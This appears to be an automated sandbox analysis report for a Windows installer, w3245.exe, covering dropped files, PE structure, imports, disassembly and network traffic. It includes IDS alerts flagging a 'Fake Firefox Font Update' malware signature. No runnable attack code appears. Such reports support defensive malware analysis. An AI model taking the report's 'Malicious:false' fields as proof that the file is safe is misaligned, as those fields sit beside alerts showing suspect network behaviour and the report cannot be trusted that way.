                                                                                                                                                                  MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                  SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                  SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                  SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcp100.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):421200
                                                                                                                                                                  Entropy (8bit):6.59808962341698
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                  MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                  SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                  SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                  SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):770384
                                                                                                                                                                  Entropy (8bit):6.908020029901359
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                  MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                  SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                  SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                  SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\wiggery.bmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4567853
                                                                                                                                                                  Entropy (8bit):7.952114001019503
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
                                                                                                                                                                  MD5:30152DF1AEA607F1159EFEEAC2B8CED1
                                                                                                                                                                  SHA1:E290B0553638EE68EB68C1CCE1062C733906EC9B
                                                                                                                                                                  SHA-256:5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
                                                                                                                                                                  SHA-512:94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Entropy (8bit):7.995926722079058
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                  File name:w3245.exe
                                                                                                                                                                  File size:15'806'278 bytes
                                                                                                                                                                  MD5:e92b4d3ee13da899ea0ad5b54a0094ed
                                                                                                                                                                  SHA1:6068b49ac36eb618d20f5b3b4efad1d9bac68f5b
                                                                                                                                                                  SHA256:97abaf743b7b33aa0f0c6ab83527cc253c9e231c4e68da5d9a42fc45ef655877
                                                                                                                                                                  SHA512:de2156ba0bd71f3cd30bd9c2bbed9e1a4417c747252bb0c3205097b6a6ff45dfe5c4dd94650efbe635d5bd821172756f261dab42b998c7e4cd158e206f678bbd
                                                                                                                                                                  SSDEEP:393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXj2:sRcqetYMe6dgB4QoxwgD/j2
                                                                                                                                                                  TLSH:22F63332A534403AE7F50577EE29A2347E78E320575189BBE2D4FD0A6DB4489A7F3213
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                  Static PE Info

                                                                                                                                                                  General

                                                                                                                                                                  Entrypoint:0x42e2a6
                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                  File Version Major:5
                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                  Import Hash:d7e2fd259780271687ffca462b9e69b7

                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                  Instruction
                                                                                                                                                                  call 00007FBDC8CFE7DFh
                                                                                                                                                                  jmp 00007FBDC8CFE153h
                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                  mov ecx, dword ptr [esp+10h]
                                                                                                                                                                  or ecx, eax
                                                                                                                                                                  mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                  jne 00007FBDC8CFE2CBh
                                                                                                                                                                  mov eax, dword ptr [esp+04h]
                                                                                                                                                                  mul ecx
                                                                                                                                                                  retn 0010h
                                                                                                                                                                  push ebx
                                                                                                                                                                  mul ecx
                                                                                                                                                                  mov ebx, eax
                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                  mul dword ptr [esp+14h]
                                                                                                                                                                  add ebx, eax
                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                  mul ecx
                                                                                                                                                                  add edx, ebx
                                                                                                                                                                  pop ebx
                                                                                                                                                                  retn 0010h
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  cmp cl, 00000040h
                                                                                                                                                                  jnc 00007FBDC8CFE2D7h
                                                                                                                                                                  cmp cl, 00000020h
                                                                                                                                                                  jnc 00007FBDC8CFE2C8h
                                                                                                                                                                  shrd eax, edx, cl
                                                                                                                                                                  shr edx, cl
                                                                                                                                                                  ret
                                                                                                                                                                  mov eax, edx
                                                                                                                                                                  xor edx, edx
                                                                                                                                                                  and cl, 0000001Fh
                                                                                                                                                                  shr eax, cl
                                                                                                                                                                  ret
                                                                                                                                                                  xor eax, eax
                                                                                                                                                                  xor edx, edx
                                                                                                                                                                  ret
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  jmp 00007FBDC8CFE2CFh
                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                  call 00007FBDC8D04B4Ch
                                                                                                                                                                  pop ecx
                                                                                                                                                                  test eax, eax
                                                                                                                                                                  je 00007FBDC8CFE2D1h
                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                  call 00007FBDC8D04BD5h
                                                                                                                                                                  pop ecx
                                                                                                                                                                  test eax, eax
                                                                                                                                                                  je 00007FBDC8CFE2A8h
                                                                                                                                                                  pop ebp
                                                                                                                                                                  ret
                                                                                                                                                                  cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                                  je 00007FBDC8CFEB64h
                                                                                                                                                                  jmp 00007FBDC8CFEB41h
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                  call 00007FBDC8CFEB7Dh
                                                                                                                                                                  pop ecx
                                                                                                                                                                  pop ebp
                                                                                                                                                                  ret
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                  push esi
                                                                                                                                                                  mov esi, ecx
                                                                                                                                                                  mov dword ptr [esi], 00460DB8h
                                                                                                                                                                  je 00007FBDC8CFE2CCh
                                                                                                                                                                  push 0000000Ch
                                                                                                                                                                  push esi
                                                                                                                                                                  call 00007FBDC8CFE29Dh
                                                                                                                                                                  pop ecx
                                                                                                                                                                  pop ecx
                                                                                                                                                                  mov eax, esi
                                                                                                                                                                  pop esi
                                                                                                                                                                  pop ebp

                                                                                                                                                                  Rich Headers

                                                                                                                                                                  Programming Language:
                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                  Data Directories

                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x686b40xb4.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x3a24.rsrc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x3dfc.reloc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x676500x54.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x676a40x18.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x670300x40.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x4b0000x3e0.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x682340x100.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                  Sections

                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                  .text0x10000x499370x49a002319c0baa707bb66cc0bc08c55a13d8cFalse0.5314688561120543data6.570006046413636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .rdata0x4b0000x1ed600x1ee008ad6c4e18165c6d8ccdc97bab683438dFalse0.3136386639676113data5.114228301263695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .data0x6a0000x17300xa0000fde973df27dc2d36084e16d6dddbdfFalse0.274609375firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a146003.1526594027632213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .wixburn0x6c0000x380x200e9ca1c09062508c3b92e35754e60f8d0False0.107421875data0.5734966016060967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .rsrc0x6d0000x3a240x3c0088921ee6f52b1477449352c993b3919cFalse0.3304036458333333data5.550645858532838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .reloc0x710000x3dfc0x3e00dd2c47fa48872886af4c9a2e5bd90cccFalse0.8097278225806451data6.794335469567533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                  Resources

                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                  RT_ICON0x6d1780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.43185920577617326
                                                                                                                                                                  RT_MESSAGETABLE0x6da200x2840dataEnglishUnited States0.28823757763975155
                                                                                                                                                                  RT_GROUP_ICON0x702600x14dataEnglishUnited States1.15
                                                                                                                                                                  RT_VERSION0x702740x2dcdataEnglishUnited States0.4781420765027322
                                                                                                                                                                  RT_MANIFEST0x705500x4d2XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminatorsEnglishUnited States0.47568881685575365

                                                                                                                                                                  Imports

                                                                                                                                                                  DLLImport
                                                                                                                                                                  ADVAPI32.dllRegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
                                                                                                                                                                  USER32.dllPeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
                                                                                                                                                                  OLEAUT32.dllVariantInit, SysAllocString, VariantClear, SysFreeString
                                                                                                                                                                  GDI32.dllDeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
                                                                                                                                                                  SHELL32.dllCommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
                                                                                                                                                                  ole32.dllCoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
                                                                                                                                                                  KERNEL32.dllGetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
                                                                                                                                                                  RPCRT4.dllUuidCreate

                                                                                                                                                                  Possible Origin

                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                  2025-01-06T23:17:48.719723+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449850104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:17:50.082367+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449861104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:17:51.375110+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449872104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:10.796365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450061104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:12.862362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450073104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:21.925120+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450111104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:23.353479+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450112104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:24.479914+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450113104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:25.469662+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450114104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:27.736640+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450115104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:29.468954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450116104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:30.654869+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450117104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:42.932749+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450118104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:44.191071+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450119104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:45.270575+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450120104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:46.127606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450121104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:48.265713+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450122104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:50.519130+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450123104.21.80.52443TCP
                                                                                                                                                                  2025-01-06T23:18:51.816735+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450124104.21.80.52443TCP

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Jan 6, 2025 23:17:48.231978893 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:48.232011080 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:48.232067108 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:48.232985020 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:48.233000040 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:48.719649076 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:48.719722986 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:48.721347094 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:48.721362114 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:48.721592903 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:48.766314030 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:48.766330957 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:48.766339064 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.376974106 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.377059937 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.377101898 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.377113104 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.377125025 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.377151012 CET44349850104.21.80.52192.168.2.4
